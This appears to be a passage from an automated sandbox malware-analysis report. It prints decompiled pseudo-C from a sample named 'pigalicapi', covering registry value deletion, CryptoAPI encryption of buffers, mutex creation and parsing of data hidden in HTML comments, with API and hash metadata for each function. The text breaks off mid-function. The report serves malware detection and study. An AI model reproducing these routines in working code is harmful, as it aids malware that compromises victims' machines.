                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7A213D70A00209EFDB04CFE9C949FAEBBB4FB45304F20419CE605B7291D7729A46DB90
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                    			E00EC5B50(CHAR* _a4, char* _a8, intOrPtr* _a12, intOrPtr* _a16) {
                                                                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                                                                    				long _v20;
                                                                                                                                                                                                                                                    				void* _v24;
                                                                                                                                                                                                                                                    				int _v28;
                                                                                                                                                                                                                                                    				int _v32;
                                                                                                                                                                                                                                                    				char* _v36;
                                                                                                                                                                                                                                                    				char* _v40;
                                                                                                                                                                                                                                                    				void* _v44;
                                                                                                                                                                                                                                                    				void* _t69;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                                    				if(_a4 != 0 && _a8 != 0 && _a12 != 0) {
                                                                                                                                                                                                                                                    					_v32 = lstrlenA(_a8);
                                                                                                                                                                                                                                                    					_v28 = lstrlenA(_a4);
                                                                                                                                                                                                                                                    					_v24 = 0;
                                                                                                                                                                                                                                                    					_v16 = 0;
                                                                                                                                                                                                                                                    					while(_v24 < _v28) {
                                                                                                                                                                                                                                                    						_v36 = StrStrIA( &(_a4[_v24]), _a8);
                                                                                                                                                                                                                                                    						if(_v36 != 0) {
                                                                                                                                                                                                                                                    							_v16 = _v16 + 1;
                                                                                                                                                                                                                                                    							_v24 = _v36 - _a4 + _v32;
                                                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					_v20 = _v16 * 0x28;
                                                                                                                                                                                                                                                    					_t69 = VirtualAlloc(0, _v20, 0x3000, 4); // executed
                                                                                                                                                                                                                                                    					_v12 = _t69;
                                                                                                                                                                                                                                                    					if(_v12 != 0) {
                                                                                                                                                                                                                                                    						_v24 = 0;
                                                                                                                                                                                                                                                    						_v16 = 0;
                                                                                                                                                                                                                                                    						while(_v24 < _v28) {
                                                                                                                                                                                                                                                    							_v40 = StrStrIA( &(_a4[_v24]), _a8);
                                                                                                                                                                                                                                                    							if(_v40 != 0) {
                                                                                                                                                                                                                                                    								lstrcpynA(_v12 + _v16 * 0x28,  &(_a4[_v24]), _v40 -  &(_a4[_v24]) + 1);
                                                                                                                                                                                                                                                    								_v24 = _v40 - _a4 + _v32;
                                                                                                                                                                                                                                                    								_v16 = _v16 + 1;
                                                                                                                                                                                                                                                    								_v8 = _v8 + 1;
                                                                                                                                                                                                                                                    								 *_a12 = _v12;
                                                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							break;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						if(_a16 != 0) {
                                                                                                                                                                                                                                                    							_v44 = VirtualAlloc(0, _v20, 0x3000, 4);
                                                                                                                                                                                                                                                    							if(_v44 != 0) {
                                                                                                                                                                                                                                                    								E00EC7B70(_v44, _v12, _v20);
                                                                                                                                                                                                                                                    								 *_a16 = _v44;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				return _v8;
                                                                                                                                                                                                                                                    			}














                                                                                                                                                                                                                                                    0x00ec5b56
                                                                                                                                                                                                                                                    0x00ec5b61
                                                                                                                                                                                                                                                    0x00ec5b85
                                                                                                                                                                                                                                                    0x00ec5b92
                                                                                                                                                                                                                                                    0x00ec5b95
                                                                                                                                                                                                                                                    0x00ec5b9c
                                                                                                                                                                                                                                                    0x00ec5ba3
                                                                                                                                                                                                                                                    0x00ec5bbc
                                                                                                                                                                                                                                                    0x00ec5bc3
                                                                                                                                                                                                                                                    0x00ec5bcb
                                                                                                                                                                                                                                                    0x00ec5bd7
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec5bde
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec5bc3
                                                                                                                                                                                                                                                    0x00ec5be6
                                                                                                                                                                                                                                                    0x00ec5bf6
                                                                                                                                                                                                                                                    0x00ec5bfc
                                                                                                                                                                                                                                                    0x00ec5c03
                                                                                                                                                                                                                                                    0x00ec5c09
                                                                                                                                                                                                                                                    0x00ec5c10
                                                                                                                                                                                                                                                    0x00ec5c17
                                                                                                                                                                                                                                                    0x00ec5c30
                                                                                                                                                                                                                                                    0x00ec5c37
                                                                                                                                                                                                                                                    0x00ec5c59
                                                                                                                                                                                                                                                    0x00ec5c68
                                                                                                                                                                                                                                                    0x00ec5c71
                                                                                                                                                                                                                                                    0x00ec5c7a
                                                                                                                                                                                                                                                    0x00ec5c87
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec5c87
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec5c37
                                                                                                                                                                                                                                                    0x00ec5c8f
                                                                                                                                                                                                                                                    0x00ec5ca4
                                                                                                                                                                                                                                                    0x00ec5cab
                                                                                                                                                                                                                                                    0x00ec5cb9
                                                                                                                                                                                                                                                    0x00ec5cc7
                                                                                                                                                                                                                                                    0x00ec5cc7
                                                                                                                                                                                                                                                    0x00ec5cab
                                                                                                                                                                                                                                                    0x00ec5c8f
                                                                                                                                                                                                                                                    0x00ec5c03
                                                                                                                                                                                                                                                    0x00ec5ccf

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00EC5B7F
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00EC5B8C
                                                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(00000000,00000000), ref: 00EC5BB6
                                                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00EC5BF6
                                                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(00000000,00000000), ref: 00EC5C2A
                                                                                                                                                                                                                                                    • lstrcpynA.KERNEL32(00000000,00000000,-00000001), ref: 00EC5C59
                                                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00EC5C9E
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.860103508.0000000000EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_ec0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AllocVirtuallstrlen$lstrcpyn
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 808621155-0
                                                                                                                                                                                                                                                    • Opcode ID: e69628448784b44976afa4964976c71d8cd042974db48283c96881fefef176d7
                                                                                                                                                                                                                                                    • Instruction ID: 3518a33d24b9a14d68a3992c435f1c24fa51228c94a7acfbbd14b09d3af23757
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e69628448784b44976afa4964976c71d8cd042974db48283c96881fefef176d7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0451D771900609EFCB04CF94C994FEEBBB5BF48309F249159E505B7284C376AA85CFA1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                    			E00EC6CF0() {
                                                                                                                                                                                                                                                    				char _v5;
                                                                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                                                                    				void* _v16;
                                                                                                                                                                                                                                                    				int _v20;
                                                                                                                                                                                                                                                    				int _v24;
                                                                                                                                                                                                                                                    				long _v28;
                                                                                                                                                                                                                                                    				char _v60;
                                                                                                                                                                                                                                                    				long _t21;
                                                                                                                                                                                                                                                    				long _t24;
                                                                                                                                                                                                                                                    				char* _t26;
                                                                                                                                                                                                                                                    				char* _t30;
                                                                                                                                                                                                                                                    				char* _t32;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_v5 = 0;
                                                                                                                                                                                                                                                    				_v12 = 0x80000001;
                                                                                                                                                                                                                                                    				if(( *0xed435a & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                    					_v12 = 0x80000002;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				_v16 = 0;
                                                                                                                                                                                                                                                    				_t32 =  *0xed18a0; // 0xed3b88
                                                                                                                                                                                                                                                    				_t21 = RegOpenKeyExA(_v12, _t32, 0, 0xf003f,  &_v16); // executed
                                                                                                                                                                                                                                                    				if(_t21 == 0) {
                                                                                                                                                                                                                                                    					_v24 = 0x20;
                                                                                                                                                                                                                                                    					_v20 = 3;
                                                                                                                                                                                                                                                    					_t30 =  *0xed1890; // 0xed3fa6
                                                                                                                                                                                                                                                    					_t24 = RegQueryValueExA(_v16, _t30, 0,  &_v20,  &_v60,  &_v24); // executed
                                                                                                                                                                                                                                                    					_v28 = _t24;
                                                                                                                                                                                                                                                    					if(_v28 == 0) {
                                                                                                                                                                                                                                                    						_v5 = 1;
                                                                                                                                                                                                                                                    						_t26 =  *0xed1890; // 0xed3fa6
                                                                                                                                                                                                                                                    						RegDeleteValueA(_v16, _t26);
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					RegCloseKey(_v16);
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				return _v5;
                                                                                                                                                                                                                                                    			}















                                                                                                                                                                                                                                                    0x00ec6cf6
                                                                                                                                                                                                                                                    0x00ec6cfa
                                                                                                                                                                                                                                                    0x00ec6d0a
                                                                                                                                                                                                                                                    0x00ec6d0c
                                                                                                                                                                                                                                                    0x00ec6d0c
                                                                                                                                                                                                                                                    0x00ec6d13
                                                                                                                                                                                                                                                    0x00ec6d25
                                                                                                                                                                                                                                                    0x00ec6d30
                                                                                                                                                                                                                                                    0x00ec6d38
                                                                                                                                                                                                                                                    0x00ec6d3a
                                                                                                                                                                                                                                                    0x00ec6d41
                                                                                                                                                                                                                                                    0x00ec6d56
                                                                                                                                                                                                                                                    0x00ec6d61
                                                                                                                                                                                                                                                    0x00ec6d67
                                                                                                                                                                                                                                                    0x00ec6d6e
                                                                                                                                                                                                                                                    0x00ec6d70
                                                                                                                                                                                                                                                    0x00ec6d74
                                                                                                                                                                                                                                                    0x00ec6d7e
                                                                                                                                                                                                                                                    0x00ec6d7e
                                                                                                                                                                                                                                                    0x00ec6d88
                                                                                                                                                                                                                                                    0x00ec6d88
                                                                                                                                                                                                                                                    0x00ec6d94

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000001,00ED3B88,00000000,000F003F,00000000), ref: 00EC6D30
                                                                                                                                                                                                                                                    • RegQueryValueExA.KERNEL32(00000000,00ED3FA6,00000000,00000003,?,00000020), ref: 00EC6D61
                                                                                                                                                                                                                                                    • RegDeleteValueA.ADVAPI32(00000000,00ED3FA6), ref: 00EC6D7E
                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00EC6D88
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.860103508.0000000000EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_ec0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Value$CloseDeleteOpenQuery
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 647993726-3916222277
                                                                                                                                                                                                                                                    • Opcode ID: 3c160df4aec8074b8a813ee681862e426fe0ed8f49bb3220b05756112af09756
                                                                                                                                                                                                                                                    • Instruction ID: b748d40d95ca72d4617cb9c514a9b6d2c880c104e11ec7e46b38bbc53712cb27
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3c160df4aec8074b8a813ee681862e426fe0ed8f49bb3220b05756112af09756
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E8113075900248AFDB04DFE5D849FBFBBB8EB48304F14418CE515B7240D776560ACBA0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                    			E00EC8370(intOrPtr _a4, long _a8, char _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                    				long _v8;
                                                                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                                                                    				void* _v16;
                                                                                                                                                                                                                                                    				long _v20;
                                                                                                                                                                                                                                                    				long _v24;
                                                                                                                                                                                                                                                    				intOrPtr _v28;
                                                                                                                                                                                                                                                    				void* _v32;
                                                                                                                                                                                                                                                    				char _v36;
                                                                                                                                                                                                                                                    				char _v40;
                                                                                                                                                                                                                                                    				char _v44;
                                                                                                                                                                                                                                                    				char _v48;
                                                                                                                                                                                                                                                    				char _v52;
                                                                                                                                                                                                                                                    				intOrPtr* _v56;
                                                                                                                                                                                                                                                    				long _v60;
                                                                                                                                                                                                                                                    				void* _t79;
                                                                                                                                                                                                                                                    				void* _t80;
                                                                                                                                                                                                                                                    				void* _t85;
                                                                                                                                                                                                                                                    				void* _t90;
                                                                                                                                                                                                                                                    				void* _t94;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                                    				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0 || _a16 < _a8) {
                                                                                                                                                                                                                                                    					L17:
                                                                                                                                                                                                                                                    					return _v8;
                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                    					_t79 = VirtualAlloc(0, 0x1000, 0x3000, 4); // executed
                                                                                                                                                                                                                                                    					_v16 = _t79;
                                                                                                                                                                                                                                                    					_t80 = VirtualAlloc(0, 0x1000, 0x3000, 4); // executed
                                                                                                                                                                                                                                                    					_v12 = _t80;
                                                                                                                                                                                                                                                    					if(_v16 != 0 && _v12 != 0) {
                                                                                                                                                                                                                                                    						_v24 = 0x1000;
                                                                                                                                                                                                                                                    						_v20 = 0x1000;
                                                                                                                                                                                                                                                    						_t85 = E00EC8800(_v16,  &_v24, _v12,  &_v20, 0xed3378, 0x94); // executed
                                                                                                                                                                                                                                                    						if(_t85 != 0) {
                                                                                                                                                                                                                                                    							_t21 = _a8 + 0x10; // 0x1010
                                                                                                                                                                                                                                                    							_v28 = _v20 + _t21;
                                                                                                                                                                                                                                                    							_t170 = _a16 - _v28;
                                                                                                                                                                                                                                                    							if(_a16 >= _v28) {
                                                                                                                                                                                                                                                    								_v40 = E00EC8770(_t170, 0xa);
                                                                                                                                                                                                                                                    								_v36 = E00EC87D0(0xffffffff);
                                                                                                                                                                                                                                                    								_t90 = VirtualAlloc(0, _a8, 0x3000, 4); // executed
                                                                                                                                                                                                                                                    								_v32 = _t90;
                                                                                                                                                                                                                                                    								if(_v32 != 0) {
                                                                                                                                                                                                                                                    									_v44 = _a8;
                                                                                                                                                                                                                                                    									E00EC7B70(_v32, _a4, _a8);
                                                                                                                                                                                                                                                    									_t94 = E00EC8970(_v32,  &_v44, _v16, _v24); // executed
                                                                                                                                                                                                                                                    									if(_t94 != 0) {
                                                                                                                                                                                                                                                    										_v48 = _a12;
                                                                                                                                                                                                                                                    										E00EC85D0( &_v48,  &_v40, 4);
                                                                                                                                                                                                                                                    										E00EC85D0( &_v48,  &_v36, 4);
                                                                                                                                                                                                                                                    										_v60 = 0;
                                                                                                                                                                                                                                                    										_v56 = _v48;
                                                                                                                                                                                                                                                    										E00EC85D0( &_v48,  &_v60, 4);
                                                                                                                                                                                                                                                    										_v52 = _v48;
                                                                                                                                                                                                                                                    										E00EC85D0( &_v48,  &_v20, 4);
                                                                                                                                                                                                                                                    										E00EC85D0( &_v48, _v12, _v20);
                                                                                                                                                                                                                                                    										E00EC8650(_v36, _v52, _v48 - _v52, _v36);
                                                                                                                                                                                                                                                    										E00EC85D0( &_v48, _v32, _v44);
                                                                                                                                                                                                                                                    										 *_v56 = E00EC16F0(_a12 + 0xc, _v48 - _a12 + 0xc);
                                                                                                                                                                                                                                                    										_v8 = _v48 - _a12;
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    									VirtualFree(_v32, 0, 0x8000); // executed
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					if(_v16 != 0) {
                                                                                                                                                                                                                                                    						VirtualFree(_v16, 0, 0x8000); // executed
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					if(_v12 != 0) {
                                                                                                                                                                                                                                                    						VirtualFree(_v12, 0, 0x8000); // executed
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					goto L17;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    			}






















                                                                                                                                                                                                                                                    0x00ec8376
                                                                                                                                                                                                                                                    0x00ec8381
                                                                                                                                                                                                                                                    0x00ec85c0
                                                                                                                                                                                                                                                    0x00ec85c6
                                                                                                                                                                                                                                                    0x00ec83b1
                                                                                                                                                                                                                                                    0x00ec83bf
                                                                                                                                                                                                                                                    0x00ec83c5
                                                                                                                                                                                                                                                    0x00ec83d6
                                                                                                                                                                                                                                                    0x00ec83dc
                                                                                                                                                                                                                                                    0x00ec83e3
                                                                                                                                                                                                                                                    0x00ec83f3
                                                                                                                                                                                                                                                    0x00ec83fa
                                                                                                                                                                                                                                                    0x00ec841b
                                                                                                                                                                                                                                                    0x00ec8425
                                                                                                                                                                                                                                                    0x00ec8431
                                                                                                                                                                                                                                                    0x00ec8435
                                                                                                                                                                                                                                                    0x00ec843b
                                                                                                                                                                                                                                                    0x00ec843e
                                                                                                                                                                                                                                                    0x00ec844e
                                                                                                                                                                                                                                                    0x00ec845b
                                                                                                                                                                                                                                                    0x00ec846b
                                                                                                                                                                                                                                                    0x00ec8471
                                                                                                                                                                                                                                                    0x00ec8478
                                                                                                                                                                                                                                                    0x00ec8481
                                                                                                                                                                                                                                                    0x00ec8490
                                                                                                                                                                                                                                                    0x00ec84a8
                                                                                                                                                                                                                                                    0x00ec84b2
                                                                                                                                                                                                                                                    0x00ec84bb
                                                                                                                                                                                                                                                    0x00ec84c8
                                                                                                                                                                                                                                                    0x00ec84da
                                                                                                                                                                                                                                                    0x00ec84e2
                                                                                                                                                                                                                                                    0x00ec84ec
                                                                                                                                                                                                                                                    0x00ec84f9
                                                                                                                                                                                                                                                    0x00ec8504
                                                                                                                                                                                                                                                    0x00ec8511
                                                                                                                                                                                                                                                    0x00ec8525
                                                                                                                                                                                                                                                    0x00ec853c
                                                                                                                                                                                                                                                    0x00ec8550
                                                                                                                                                                                                                                                    0x00ec8576
                                                                                                                                                                                                                                                    0x00ec857e
                                                                                                                                                                                                                                                    0x00ec857e
                                                                                                                                                                                                                                                    0x00ec858c
                                                                                                                                                                                                                                                    0x00ec858c
                                                                                                                                                                                                                                                    0x00ec8478
                                                                                                                                                                                                                                                    0x00ec843e
                                                                                                                                                                                                                                                    0x00ec8425
                                                                                                                                                                                                                                                    0x00ec8596
                                                                                                                                                                                                                                                    0x00ec85a3
                                                                                                                                                                                                                                                    0x00ec85a3
                                                                                                                                                                                                                                                    0x00ec85ad
                                                                                                                                                                                                                                                    0x00ec85ba
                                                                                                                                                                                                                                                    0x00ec85ba
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00ec85ad

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00001000,00003000,00000004), ref: 00EC83BF
                                                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00001000,00003000,00000004), ref: 00EC83D6
                                                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00EC846B
                                                                                                                                                                                                                                                      • Part of subcall function 00EC8970: CryptAcquireContextA.ADVAPI32(00000000,00ECC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 00EC89BF
                                                                                                                                                                                                                                                      • Part of subcall function 00EC8970: GetLastError.KERNEL32 ref: 00EC89C9
                                                                                                                                                                                                                                                      • Part of subcall function 00EC8970: CryptAcquireContextA.ADVAPI32(00000000,00ECC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 00EC89F8
                                                                                                                                                                                                                                                      • Part of subcall function 00EC8970: CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000001,00000000), ref: 00EC8A1F
                                                                                                                                                                                                                                                      • Part of subcall function 00EC8970: CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00EC8A41
                                                                                                                                                                                                                                                      • Part of subcall function 00EC8970: CryptDestroyKey.ADVAPI32(00000000), ref: 00EC8A4E
                                                                                                                                                                                                                                                      • Part of subcall function 00EC8970: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00EC8A5A
                                                                                                                                                                                                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00EC858C
                                                                                                                                                                                                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00EC85A3
                                                                                                                                                                                                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00EC85BA
                                                                                                                                                                                                                                                      • Part of subcall function 00EC8800: CryptAcquireContextA.ADVAPI32(00000000,00ECC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,00EC8420,00000000,00001000,00000000), ref: 00EC883B
                                                                                                                                                                                                                                                      • Part of subcall function 00EC8800: GetLastError.KERNEL32 ref: 00EC8845
                                                                                                                                                                                                                                                      • Part of subcall function 00EC8800: CryptAcquireContextA.ADVAPI32(00000000,00ECC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 00EC8874
                                                                                                                                                                                                                                                      • Part of subcall function 00EC8800: CryptGenKey.ADVAPI32(00000000,00006801,?,00000000), ref: 00EC88AF
                                                                                                                                                                                                                                                      • Part of subcall function 00EC8800: CryptExportKey.ADVAPI32(00000000,00000000,00000008,00000000,00000000,00000000), ref: 00EC88CF
                                                                                                                                                                                                                                                      • Part of subcall function 00EC8800: CryptImportKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?), ref: 00EC890C
                                                                                                                                                                                                                                                      • Part of subcall function 00EC8800: CryptExportKey.ADVAPI32(00000000,?,00000001,00000000,00000000,00000000), ref: 00EC892A
                                                                                                                                                                                                                                                      • Part of subcall function 00EC8800: CryptDestroyKey.ADVAPI32(?), ref: 00EC8937
                                                                                                                                                                                                                                                      • Part of subcall function 00EC87D0: QueryPerformanceCounter.KERNEL32(?), ref: 00EC87E7
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.860103508.0000000000EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_ec0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Crypt$Virtual$Context$Acquire$AllocFree$DestroyErrorExportImportLast$CounterEncryptPerformanceQueryRelease
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 487564122-0
                                                                                                                                                                                                                                                    • Opcode ID: ec3120b91727520d7fddf8cb47c0c067dc02b412bdb149cd04dbc4be7541d115
                                                                                                                                                                                                                                                    • Instruction ID: 8c2d3345326ebf57c907118ca61df5d724ed694390ef6eca8b1cb49f5ea98c5b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ec3120b91727520d7fddf8cb47c0c067dc02b412bdb149cd04dbc4be7541d115
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 79715EB5D00208AFDB04DFA4DE45FEEB7B4BB48304F148119FA15B7280EB75AA45CBA5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                    			E00EC5E00() {
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				CreateMutexA(0, 0, "pigalicapi"); // executed
                                                                                                                                                                                                                                                    				return 0 | GetLastError() == 0x000000b7;
                                                                                                                                                                                                                                                    			}



                                                                                                                                                                                                                                                    0x00ec5e0c
                                                                                                                                                                                                                                                    0x00ec5e25

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,pigalicapi,?,00EC3BEB), ref: 00EC5E0C
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00EC3BEB), ref: 00EC5E12
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.860103508.0000000000EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_ec0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CreateErrorLastMutex
                                                                                                                                                                                                                                                    • String ID: pigalicapi
                                                                                                                                                                                                                                                    • API String ID: 1925916568-2184165135
                                                                                                                                                                                                                                                    • Opcode ID: b7e657a96f45c3c97098f69308eeb7100683d42d1ab82c8f07d8b58ad6a7e281
                                                                                                                                                                                                                                                    • Instruction ID: 1e52d96aefd2503d974c6886655ad998e41a2ef3f6889695a866cbc360f75fe1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b7e657a96f45c3c97098f69308eeb7100683d42d1ab82c8f07d8b58ad6a7e281
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DBC08C362843146FE2001773ED4BF493AA8C710F81F640031F10EF55E2898260468B27
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                    			E00EC8250(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                                                    				signed int _v13;
                                                                                                                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                                                                                                                    				intOrPtr _v24;
                                                                                                                                                                                                                                                    				char _v28;
                                                                                                                                                                                                                                                    				char _v32;
                                                                                                                                                                                                                                                    				char* _v36;
                                                                                                                                                                                                                                                    				intOrPtr _v40;
                                                                                                                                                                                                                                                    				intOrPtr _v44;
                                                                                                                                                                                                                                                    				char _t48;
                                                                                                                                                                                                                                                    				intOrPtr _t51;
                                                                                                                                                                                                                                                    				intOrPtr _t58;
                                                                                                                                                                                                                                                    				char _t63;
                                                                                                                                                                                                                                                    				void* _t77;
                                                                                                                                                                                                                                                    				void* _t78;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                                    				if(_a4 != 0 && _a8 != 0 && _a12 != 0 && _a16 != 0) {
                                                                                                                                                                                                                                                    					_v12 = 0;
                                                                                                                                                                                                                                                    					_v20 = _a4;
                                                                                                                                                                                                                                                    					_v13 = 0;
                                                                                                                                                                                                                                                    					while(_v12 < _a8 - 0xa && (_v13 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                    						_t48 = "<!--"; // 0x2d2d213c
                                                                                                                                                                                                                                                    						_v32 = _t48;
                                                                                                                                                                                                                                                    						_t63 =  *0xecc700; // 0x0
                                                                                                                                                                                                                                                    						_v28 = _t63;
                                                                                                                                                                                                                                                    						_t51 = E00EC7AF0(_v20 + _v12, _a8 - _v12,  &_v32, 4);
                                                                                                                                                                                                                                                    						_t78 = _t77 + 0x10;
                                                                                                                                                                                                                                                    						_v24 = _t51;
                                                                                                                                                                                                                                                    						if(_v24 == 0) {
                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                    							_v12 = _v24 - _a4;
                                                                                                                                                                                                                                                    							_t28 = _v12 + 4; // 0x4
                                                                                                                                                                                                                                                    							_v36 = StrStrA(_v20 + _t28, "-->");
                                                                                                                                                                                                                                                    							if(_v36 != 0) {
                                                                                                                                                                                                                                                    								_v44 = _v36 - _v24 - 4;
                                                                                                                                                                                                                                                    								_t58 = E00EC8090(_v24 + 4, _v44, _a12, _a16); // executed
                                                                                                                                                                                                                                                    								_t77 = _t78 + 0x10;
                                                                                                                                                                                                                                                    								_v40 = _t58;
                                                                                                                                                                                                                                                    								if(_v40 > 0) {
